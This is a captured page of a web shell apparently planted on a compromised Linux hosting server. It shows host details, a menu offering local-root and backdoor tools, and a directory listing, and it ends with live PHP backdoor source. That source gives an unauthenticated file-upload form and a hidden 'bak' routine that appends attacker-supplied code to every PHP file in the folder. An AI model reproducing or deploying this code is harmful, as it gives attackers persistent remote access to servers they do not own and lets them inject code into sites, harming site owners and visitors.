Linux thaedus.aserv.co.za 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 197.242.159.149 & Your IP : 216.73.217.62
Domains :
Cant Read [ /etc/named.conf ]
User : bigpuxtb
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
bigpuxtb /
.softaculous /
Delete
Unzip
Name
Size
Permission
Date
Action
logs
[ DIR ]
drwx------
2021-08-11 10:24
sess
[ DIR ]
drwx--x--x
2026-04-20 20:33
status
[ DIR ]
drwx--x--x
2025-02-04 09:30
tmp
[ DIR ]
drwxr-xr-x
2013-05-14 06:41
au_extra_backups.php
496
B
-rw-------
2021-10-01 20:37
failed_auto_upgrade.php
149
B
-rw-------
2026-08-03 15:53
failed_auto_upgrade_extras.php
78
B
-rw-------
2021-09-24 20:39
installations.php
2.81
KB
-rw-------
2025-10-04 20:36
rhugrxtx.php
760
B
-rw-r--r--
2026-01-07 15:23
sitepad.php
168
B
-rw-------
2017-11-24 05:25
user.php
637
B
-rw-------
2021-08-11 20:43
Save
Rename
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>